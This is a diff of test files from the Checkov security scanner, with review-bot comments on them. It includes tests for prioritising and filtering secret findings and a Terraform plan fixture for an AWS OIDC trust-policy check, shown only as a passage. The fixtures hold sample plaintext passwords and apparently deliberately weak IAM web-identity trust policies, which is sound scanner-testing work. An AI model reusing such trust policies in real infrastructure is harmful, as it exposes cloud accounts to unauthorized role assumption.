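Review bot: With the `mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", True)` line removed, the `mocker` fixture requested by `def test_console_output(mocker, sca_package_2_report):` appears to have no remaining use in this test; if nothing outside the hunk uses it, drop it with `def test_console_output(sca_package_2_report):` so the signature does not advertise a dependency it no longer has. The sibling `test_console_output_in_tty` in the `-92,7` hunk still calls `mocker.patch.dict`, so that one keeps the fixture. The body of `test_console_output` continues past this hunk, so the "unused" claim should be confirmed against the full function.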
@@ -92,7 +91,6 @@ def test_console_output(mocker, sca_package_2_report): def test_console_output_in_tty(mocker: MockerFixture, sca_package_2_report): # simulate a tty call by enforcing color mocker.patch.dict(os.environ, {"FORCE_COLOR": "True"}) - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", True) console_output = sca_package_2_report.print_console(False, False, None, None, False) 
@@ -120,11 +118,11 @@ def test_console_output_in_tty(mocker: MockerFixture, sca_package_2_report): '\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n', "\n", "\t/requirements.txt - Licenses Statuses:\n", - '\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n', - "\t│ Package name │ Package version │ Policy ID │ License │ Status │\n", - '\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n', - '\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │\n', - '\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n', + '\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n', + "\t│ Package name │ Package version │ Policy ID │ License │\n", + '\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n', + '\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │\n', + '\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n', "\n", "\t/path/to/go.sum - CVEs Summary:\n", '\t┌──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┐\n', diff --git a/tests/secrets/sanity/iac_fp/main.json b/tests/secrets/sanity/iac_fp/main.json new file mode 100644 index 00000000000..e8b2c4d4c2a --- /dev/null +++ b/tests/secrets/sanity/iac_fp/main.json @@ -0,0 +1,3 @@ +{ + "MetadataOptions": { "HttpsTokens": "optional" } +} \ No newline at end of file 
diff --git a/tests/secrets/test_prioritise_secrets.py b/tests/secrets/test_prioritise_secrets.py new file mode 100644 index 00000000000..77617d58725 --- /dev/null +++ b/tests/secrets/test_prioritise_secrets.py 
@@ -0,0 +1,68 @@ +import unittest + +from checkov.common.models.enums import CheckResult +from checkov.common.output.secrets_record import SecretsRecord +from checkov.secrets.runner import Runner, ENTROPY_CHECK_IDS, GENERIC_PRIVATE_KEY_CHECK_IDS + + +class TestPrioritiseSecrets(unittest.TestCase): + def setUp(self): + self.secret_records = { + 'key1': SecretsRecord(check_id='CKV_SECRET_6', check_name='foo', + check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')], + file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None, + check_class='CheckClass', file_abs_path='abs_path'), + 'key2': SecretsRecord(check_id='CKV_SECRET_10', check_name='foo', + check_result={"result": CheckResult.FAILED}, + code_block=[(1, 'baz')], file_path='qux', file_line_range=[1, 2], resource='resource', + evaluations=None, check_class='CheckClass', file_abs_path='abs_path'), + 'key3': SecretsRecord(check_id='CKV_SECRET_18', check_name='foo', + check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')], + file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None, + check_class='CheckClass', file_abs_path='abs_path'), + 'key4': SecretsRecord(check_id='CKV_SECRET_192', check_name='foo', + check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')], + file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None, + check_class='CheckClass', file_abs_path='abs_path'), + } + self.ENTROPY_CHECK_IDS = ENTROPY_CHECK_IDS + self.GENERIC_PRIVATE_KEY_CHECK_IDS = GENERIC_PRIVATE_KEY_CHECK_IDS + + def test_entropy_check_id_removed(self): + result = Runner._prioritise_secrets(self.secret_records, 'key1', 'CKV_SECRET_18') + self.assertTrue(result) + self.assertNotIn('key1', self.secret_records) + + def test_generic_private_key_check_id_removed(self): + result = Runner._prioritise_secrets(self.secret_records, 'key2', 'CKV_SECRET_18') + self.assertTrue(result) + self.assertNotIn('key2', self.secret_records) + + def 
test_generic_private_key_check_id_192_removed(self): + result = Runner._prioritise_secrets(self.secret_records, 'key4', 'CKV_SECRET_18') + self.assertTrue(result) + self.assertNotIn('key4', self.secret_records) + + def test_no_removal_entropy_check_id(self): + result = Runner._prioritise_secrets(self.secret_records, 'key1', 'CKV_SECRET_6') + self.assertFalse(result) + self.assertIn('key1', self.secret_records) + + def test_no_removal_generic_private_key_check_id(self): + result = Runner._prioritise_secrets(self.secret_records, 'key2', 'CKV_SECRET_10') + self.assertFalse(result) + self.assertIn('key2', self.secret_records) + + def test_no_removal_generic_private_key_check_id_192(self): + result = Runner._prioritise_secrets(self.secret_records, 'key4', 'CKV_SECRET_192') + self.assertFalse(result) + self.assertIn('key4', self.secret_records) + + def test_no_removal_other_check_id(self): + result = Runner._prioritise_secrets(self.secret_records, 'key3', 'CKV_SECRET_1000') + self.assertFalse(result) + self.assertIn('key3', self.secret_records) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/secrets/test_vault_secrets.py b/tests/secrets/test_vault_secrets.py new file mode 100644 index 00000000000..e758fbc4aaa --- /dev/null +++ b/tests/secrets/test_vault_secrets.py 
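Review bot: `setUp` stores `self.ENTROPY_CHECK_IDS = ENTROPY_CHECK_IDS` and `self.GENERIC_PRIVATE_KEY_CHECK_IDS = GENERIC_PRIVATE_KEY_CHECK_IDS`, but no test reads either attribute, while the test methods hard-code `'CKV_SECRET_6'`, `'CKV_SECRET_10'` and `'CKV_SECRET_192'` as the entropy and generic-private-key ids. If those sets in `checkov.secrets.runner` ever change, these tests keep passing or start failing for the wrong reason; either delete the two attributes or turn them into guards such as `self.assertIn('CKV_SECRET_6', ENTROPY_CHECK_IDS)` and `self.assertIn('CKV_SECRET_10', GENERIC_PRIVATE_KEY_CHECK_IDS)` in `setUp`. The four `SecretsRecord(...)` constructions differ only in `check_id`; a small module-level helper taking the id would make the fixture readable and make the removed-vs-kept contrast the only thing each test shows. The visible cases cover "generic existing record displaced by a specific incoming id" and "same id does not displace", but not the reverse direction (existing `'CKV_SECRET_18'` record with an incoming `'CKV_SECRET_6'`); if `_prioritise_secrets` is meant to keep the specific record there, a test pinning that would close the gap.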
@@ -0,0 +1,21 @@ +from checkov.secrets.runner import should_filter_vault_secret + +HIGH_ENTROPY_CHECK_ID = 'CKV_SECRET_80' + +def test_vault_secrets_false_positives(): + fp_secrets = [ + 'DB_RBMQ_PASSWORD: vault: secret/data/product-web/mcrp-qwr-v2/mabbot#PASSWORD', + 'WEB_PASSWORD: vault: secret/data/product/fwrp-qe-v3/parme3#PASSWORD', + 'PASS: vault: secret/sr/dt/pro/fwrtq1#2/weg#PASSWORD' + ] + for fp_secret in fp_secrets: + assert should_filter_vault_secret(fp_secret, HIGH_ENTROPY_CHECK_ID) + +def test_secrets_without_vault(): + real_secrets = [ + 'ldap_pwd = k%udk423u4%P8=H_', + 'password = J6T4ww+##14m', + 'PS = 1r4#Gf2FDF$343r3m2me3r%' + ] + for real_secret in real_secrets: + assert not should_filter_vault_secret(real_secret, HIGH_ENTROPY_CHECK_ID) \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_GithubActionsOIDCTrustPolicy/tfplan.json b/tests/terraform/checks/data/aws/example_GithubActionsOIDCTrustPolicy/tfplan.json new file mode 100644 index 00000000000..d148954eaf2 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_GithubActionsOIDCTrustPolicy/tfplan.json 
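Review bot: Both tests pass the same second argument, `HIGH_ENTROPY_CHECK_ID`, so nothing here shows whether `should_filter_vault_secret` consults the check id at all; if the filter is only meant to apply to entropy checks, add one case passing a vault-looking string with a non-entropy id and assert the intended result, so a regression that ignores the id is caught. If `'CKV_SECRET_80'` is expected to be one of the runner's entropy ids, consider asserting that membership against `ENTROPY_CHECK_IDS` (which the sibling `tests/secrets/test_prioritise_secrets.py` already imports) rather than relying on a bare string constant. Minor style: top-level definitions are separated by a single blank line where PEP 8 expects two, and the file is missing its trailing newline (the `\ No newline at end of file` marker).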
@@ -0,0 +1,1605 @@ +{ + "format_version": "1.2", + "terraform_version": "1.5.7", + "planned_values": { + "root_module": { + "child_modules": [ + { + "resources": [ + { + "address": "module.poc.aws_iam_openid_connect_provider.r5", + "mode": "managed", + "type": "aws_iam_openid_connect_provider", + "name": "r5", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "client_id_list": [ + "sts.amazonaws.com" + ], + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + }, + "thumbprint_list": [ + "123" + ], + "url": "https://accounts.google.com" + }, + "sensitive_values": { + "client_id_list": [ + false + ], + "tags_all": {}, + "thumbprint_list": [ + false + ] + } + }, + { + "address": "module.poc.aws_iam_role.r6[\"p1\"]", + "mode": "managed", + "type": "aws_iam_role", + "name": "r6", + "index": "p1", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "description": null, + "force_detach_policies": true, + "inline_policy": [ + { + "name": "eks_s3_access", + "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p1/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}" + } + ], + "max_session_duration": 3600, + "name": "r8", + "path": "/", + "permissions_boundary": null, + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + }, + "sensitive_values": { + "inline_policy": [ + {} + ], + "managed_policy_arns": [], + "tags_all": {} + } + }, + { + "address": "module.poc.aws_iam_role.r6[\"p2\"]", + "mode": "managed", + "type": "aws_iam_role", + "name": "r6", + "index": "p2", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "description": null, + "force_detach_policies": true, + 
"inline_policy": [ + { + "name": "eks_s3_access", + "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p2/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}" + } + ], + "max_session_duration": 3600, + "name": "r9", + "path": "/", + "permissions_boundary": null, + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + }, + "sensitive_values": { + "inline_policy": [ + {} + ], + "managed_policy_arns": [], + "tags_all": {} + } + }, + { + "address": "module.poc.aws_iam_role.r1[\"p1\"]", + "mode": "managed", + "type": "aws_iam_role", + "name": "r1", + "index": "p1", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "description": null, + "force_detach_policies": true, + "inline_policy": [ + { + "name": "eks_s3_access", + "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p1/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}" + } + ], + "max_session_duration": 3600, + "name": "r7", + "path": "/", + "permissions_boundary": null, + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + }, + "sensitive_values": { + "inline_policy": [ + {} + ], + "managed_policy_arns": [], + "tags_all": {} + } + }, + { + "address": "module.poc.aws_iam_role.r1[\"p2\"]", + "mode": "managed", + "type": "aws_iam_role", + "name": "r1", + "index": "p2", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "description": null, + "force_detach_policies": true, + "inline_policy": [ + { + "name": "eks_s3_access", + "policy": 
"{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p2/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}" + } + ], + "max_session_duration": 3600, + "name": "r2", + "path": "/", + "permissions_boundary": null, + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + }, + "sensitive_values": { + "inline_policy": [ + {} + ], + "managed_policy_arns": [], + "tags_all": {} + } + }, + { + "address": "module.poc.data.aws_iam_policy_document.r4[\"p1\"]", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r4", + "index": "p1", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "override_json": null, + "override_policy_documents": null, + "policy_id": null, + "source_json": null, + "source_policy_documents": null, + "statement": [ + { + "actions": [ + "sts:AssumeRoleWithWebIdentity" + ], + "condition": [ + { + "test": "StringEquals", + "values": [ + "sts.amazonaws.com" + ], + "variable": "accounts.google.com:aud" + }, + { + "test": "StringEquals", + "values": [ + "system:serviceaccount:p1:default" + ], + "variable": "accounts.google.com:sub" + } + ], + "effect": "Allow", + "not_actions": null, + "not_principals": [], + "not_resources": null, + "principals": [ + { + "identifiers": [ + "cognito-identity.amazonaws.com" + ], + "type": "Federated" + } + ], + "resources": null, + "sid": null + } + ], + "version": null + }, + "sensitive_values": { + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + } + }, + { + "address": "module.poc.data.aws_iam_policy_document.r4[\"p2\"]", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r4", + "index": 
"p2", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "override_json": null, + "override_policy_documents": null, + "policy_id": null, + "source_json": null, + "source_policy_documents": null, + "statement": [ + { + "actions": [ + "sts:AssumeRoleWithWebIdentity" + ], + "condition": [ + { + "test": "StringEquals", + "values": [ + "sts.amazonaws.com" + ], + "variable": "accounts.google.com:aud" + }, + { + "test": "StringEquals", + "values": [ + "system:serviceaccount:p2:default" + ], + "variable": "accounts.google.com:sub" + } + ], + "effect": "Allow", + "not_actions": null, + "not_principals": [], + "not_resources": null, + "principals": [ + { + "identifiers": [ + "cognito-identity.amazonaws.com" + ], + "type": "Federated" + } + ], + "resources": null, + "sid": null + } + ], + "version": null + }, + "sensitive_values": { + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + } + }, + { + "address": "module.poc.data.aws_iam_policy_document.r3[\"p1\"]", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r3", + "index": "p1", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "override_json": null, + "override_policy_documents": null, + "policy_id": null, + "source_json": null, + "source_policy_documents": null, + "statement": [ + { + "actions": [ + "sts:AssumeRoleWithWebIdentity" + ], + "condition": [ + { + "test": "StringEquals", + "values": [ + "sts.amazonaws.com" + ], + "variable": "accounts.google.com:aud" + }, + { + "test": "StringEquals", + "values": [ + "system:serviceaccount:p1:default" + ], + "variable": "accounts.google.com:sub" + } + ], + "effect": "Allow", + "not_actions": null, + "not_principals": [], + "not_resources": null, + "principals": [ + { + "identifiers": [ + 
null + ], + "type": "Federated" + } + ], + "resources": null, + "sid": null + } + ], + "version": null + }, + "sensitive_values": { + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + } + }, + { + "address": "module.poc.data.aws_iam_policy_document.r3[\"p2\"]", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r3", + "index": "p2", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "override_json": null, + "override_policy_documents": null, + "policy_id": null, + "source_json": null, + "source_policy_documents": null, + "statement": [ + { + "actions": [ + "sts:AssumeRoleWithWebIdentity" + ], + "condition": [ + { + "test": "StringEquals", + "values": [ + "sts.amazonaws.com" + ], + "variable": "accounts.google.com:aud" + }, + { + "test": "StringEquals", + "values": [ + "system:serviceaccount:p2:default" + ], + "variable": "accounts.google.com:sub" + } + ], + "effect": "Allow", + "not_actions": null, + "not_principals": [], + "not_resources": null, + "principals": [ + { + "identifiers": [ + null + ], + "type": "Federated" + } + ], + "resources": null, + "sid": null + } + ], + "version": null + }, + "sensitive_values": { + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + } + } + ], + "address": "module.poc" + } + ] + } + }, + "resource_changes": [ + { + "address": "module.poc.data.aws_iam_policy_document.r4[\"p1\"]", + "module_address": "module.poc", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r4", + "index": "p1", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "read" + ], + "before": 
null, + "after": { + "override_json": null, + "override_policy_documents": null, + "policy_id": null, + "source_json": null, + "source_policy_documents": null, + "statement": [ + { + "actions": [ + "sts:AssumeRoleWithWebIdentity" + ], + "condition": [ + { + "test": "StringEquals", + "values": [ + "sts.amazonaws.com" + ], + "variable": "accounts.google.com:aud" + }, + { + "test": "StringEquals", + "values": [ + "system:serviceaccount:p1:default" + ], + "variable": "accounts.google.com:sub" + } + ], + "effect": "Allow", + "not_actions": null, + "not_principals": [], + "not_resources": null, + "principals": [ + { + "identifiers": [ + "cognito-identity.amazonaws.com" + ], + "type": "Federated" + } + ], + "resources": null, + "sid": null + } + ], + "version": null + }, + "after_unknown": { + "id": true, + "json": true, + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + }, + "before_sensitive": false, + "after_sensitive": { + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + } + }, + "action_reason": "read_because_dependency_pending" + }, + { + "address": "module.poc.data.aws_iam_policy_document.r4[\"p2\"]", + "module_address": "module.poc", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r4", + "index": "p2", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "read" + ], + "before": null, + "after": { + "override_json": null, + "override_policy_documents": null, + "policy_id": null, + "source_json": null, + "source_policy_documents": null, + "statement": [ + { + "actions": [ + "sts:AssumeRoleWithWebIdentity" + ], + "condition": [ + { + "test": 
"StringEquals", + "values": [ + "sts.amazonaws.com" + ], + "variable": "accounts.google.com:aud" + }, + { + "test": "StringEquals", + "values": [ + "system:serviceaccount:p2:default" + ], + "variable": "accounts.google.com:sub" + } + ], + "effect": "Allow", + "not_actions": null, + "not_principals": [], + "not_resources": null, + "principals": [ + { + "identifiers": [ + "cognito-identity.amazonaws.com" + ], + "type": "Federated" + } + ], + "resources": null, + "sid": null + } + ], + "version": null + }, + "after_unknown": { + "id": true, + "json": true, + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + }, + "before_sensitive": false, + "after_sensitive": { + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + } + }, + "action_reason": "read_because_dependency_pending" + }, + { + "address": "module.poc.data.aws_iam_policy_document.r3[\"p1\"]", + "module_address": "module.poc", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r3", + "index": "p1", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "read" + ], + "before": null, + "after": { + "override_json": null, + "override_policy_documents": null, + "policy_id": null, + "source_json": null, + "source_policy_documents": null, + "statement": [ + { + "actions": [ + "sts:AssumeRoleWithWebIdentity" + ], + "condition": [ + { + "test": "StringEquals", + "values": [ + "sts.amazonaws.com" + ], + "variable": "accounts.google.com:aud" + }, + { + "test": "StringEquals", + "values": [ + "system:serviceaccount:p1:default" + ], + "variable": "accounts.google.com:sub" + } + ], + "effect": "Allow", + "not_actions": 
null, + "not_principals": [], + "not_resources": null, + "principals": [ + { + "identifiers": [ + null + ], + "type": "Federated" + } + ], + "resources": null, + "sid": null + } + ], + "version": null + }, + "after_unknown": { + "id": true, + "json": true, + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + true + ] + } + ] + } + ] + }, + "before_sensitive": false, + "after_sensitive": { + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + } + }, + "action_reason": "read_because_config_unknown" + }, + { + "address": "module.poc.data.aws_iam_policy_document.r3[\"p2\"]", + "module_address": "module.poc", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r3", + "index": "p2", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "read" + ], + "before": null, + "after": { + "override_json": null, + "override_policy_documents": null, + "policy_id": null, + "source_json": null, + "source_policy_documents": null, + "statement": [ + { + "actions": [ + "sts:AssumeRoleWithWebIdentity" + ], + "condition": [ + { + "test": "StringEquals", + "values": [ + "sts.amazonaws.com" + ], + "variable": "accounts.google.com:aud" + }, + { + "test": "StringEquals", + "values": [ + "system:serviceaccount:p2:default" + ], + "variable": "accounts.google.com:sub" + } + ], + "effect": "Allow", + "not_actions": null, + "not_principals": [], + "not_resources": null, + "principals": [ + { + "identifiers": [ + null + ], + "type": "Federated" + } + ], + "resources": null, + "sid": null + } + ], + "version": null + }, + "after_unknown": { + "id": true, + "json": true, + "statement": [ + { + "actions": [ + false + ], + 
"condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + true + ] + } + ] + } + ] + }, + "before_sensitive": false, + "after_sensitive": { + "statement": [ + { + "actions": [ + false + ], + "condition": [ + { + "values": [ + false + ] + }, + { + "values": [ + false + ] + } + ], + "not_principals": [], + "principals": [ + { + "identifiers": [ + false + ] + } + ] + } + ] + } + }, + "action_reason": "read_because_config_unknown" + }, + { + "address": "module.poc.aws_iam_openid_connect_provider.r5", + "module_address": "module.poc", + "mode": "managed", + "type": "aws_iam_openid_connect_provider", + "name": "r5", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "client_id_list": [ + "sts.amazonaws.com" + ], + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + }, + "thumbprint_list": [ + "cf23df2207d99a74fbe169e3eba035e633b65d94" + ], + "url": "https://accounts.google.com" + }, + "after_unknown": { + "arn": true, + "client_id_list": [ + false + ], + "id": true, + "tags_all": {}, + "thumbprint_list": [ + false + ] + }, + "before_sensitive": false, + "after_sensitive": { + "client_id_list": [ + false + ], + "tags_all": {}, + "thumbprint_list": [ + false + ] + } + } + }, + { + "address": "module.poc.aws_iam_role.r6[\"p1\"]", + "module_address": "module.poc", + "mode": "managed", + "type": "aws_iam_role", + "name": "r6", + "index": "p1", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "description": null, + "force_detach_policies": true, + "inline_policy": [ + { + "name": "eks_s3_access", + "policy": 
"{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p1/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}" + } + ], + "max_session_duration": 3600, + "name": "r8", + "path": "/", + "permissions_boundary": null, + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + }, + "after_unknown": { + "arn": true, + "assume_role_policy": true, + "create_date": true, + "id": true, + "inline_policy": [ + {} + ], + "managed_policy_arns": true, + "name_prefix": true, + "tags_all": {}, + "unique_id": true + }, + "before_sensitive": false, + "after_sensitive": { + "inline_policy": [ + {} + ], + "managed_policy_arns": [], + "tags_all": {} + } + } + }, + { + "address": "module.poc.aws_iam_role.r6[\"p2\"]", + "module_address": "module.poc", + "mode": "managed", + "type": "aws_iam_role", + "name": "r6", + "index": "p2", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "description": null, + "force_detach_policies": true, + "inline_policy": [ + { + "name": "eks_s3_access", + "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p2/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}" + } + ], + "max_session_duration": 3600, + "name": "r9", + "path": "/", + "permissions_boundary": null, + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + }, + "after_unknown": { + "arn": true, + "assume_role_policy": true, + "create_date": true, + "id": true, + "inline_policy": [ + {} + ], + "managed_policy_arns": true, + "name_prefix": true, + "tags_all": {}, + "unique_id": true + }, + "before_sensitive": false, + "after_sensitive": { + 
"inline_policy": [ + {} + ], + "managed_policy_arns": [], + "tags_all": {} + } + } + }, + { + "address": "module.poc.aws_iam_role.r1[\"p1\"]", + "module_address": "module.poc", + "mode": "managed", + "type": "aws_iam_role", + "name": "r1", + "index": "p1", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "description": null, + "force_detach_policies": true, + "inline_policy": [ + { + "name": "eks_s3_access", + "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p1/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}" + } + ], + "max_session_duration": 3600, + "name": "r7", + "path": "/", + "permissions_boundary": null, + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + }, + "after_unknown": { + "arn": true, + "assume_role_policy": true, + "create_date": true, + "id": true, + "inline_policy": [ + {} + ], + "managed_policy_arns": true, + "name_prefix": true, + "tags_all": {}, + "unique_id": true + }, + "before_sensitive": false, + "after_sensitive": { + "inline_policy": [ + {} + ], + "managed_policy_arns": [], + "tags_all": {} + } + } + }, + { + "address": "module.poc.aws_iam_role.r1[\"p2\"]", + "module_address": "module.poc", + "mode": "managed", + "type": "aws_iam_role", + "name": "r1", + "index": "p2", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "description": null, + "force_detach_policies": true, + "inline_policy": [ + { + "name": "eks_s3_access", + "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p2/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}" + } 
+ ], + "max_session_duration": 3600, + "name": "r2", + "path": "/", + "permissions_boundary": null, + "tags": null, + "tags_all": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + }, + "after_unknown": { + "arn": true, + "assume_role_policy": true, + "create_date": true, + "id": true, + "inline_policy": [ + {} + ], + "managed_policy_arns": true, + "name_prefix": true, + "tags_all": {}, + "unique_id": true + }, + "before_sensitive": false, + "after_sensitive": { + "inline_policy": [ + {} + ], + "managed_policy_arns": [], + "tags_all": {} + } + } + } + ], + "configuration": { + "provider_config": { + "aws": { + "name": "aws", + "full_name": "registry.terraform.io/hashicorp/aws", + "expressions": { + "default_tags": [ + { + "tags": { + "constant_value": { + "checkov_uid": "CKV_AWS_358", + "environment": "test", + "managed_by": "terraform" + } + } + } + ], + "region": { + "constant_value": "eu-central-1" + } + } + } + }, + "root_module": { + "module_calls": { + "poc": { + "source": "./module", + "module": { + "resources": [ + { + "address": "aws_iam_openid_connect_provider.r5", + "mode": "managed", + "type": "aws_iam_openid_connect_provider", + "name": "r5", + "provider_config_key": "aws", + "expressions": { + "client_id_list": { + "constant_value": [ + 